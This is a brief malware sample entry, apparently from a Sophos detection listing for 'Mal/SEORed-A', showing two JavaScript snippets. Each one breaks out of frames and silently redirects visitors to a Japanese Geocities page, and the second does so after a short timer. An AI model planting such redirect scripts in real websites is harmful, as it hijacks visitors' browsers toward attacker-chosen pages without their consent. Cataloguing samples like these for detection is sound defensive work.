Mal/SEORed-A Malicious JavaScript Code (by Sophos)
<script>var url = "http://geocities.yahoo.co.jp/gl/gbmogiki"; if (window!=top) {top.location.href = url;} else { document.location= url;}</script>
<script>var url = "http://geocities.yahoo.co.jp/gl/gbmogiki"; function goToOtherPlace() { if (window!=top) {top.location.href = url;} else { document.location= url;} } window.setTimeout(goToOtherPlace, 10);</script>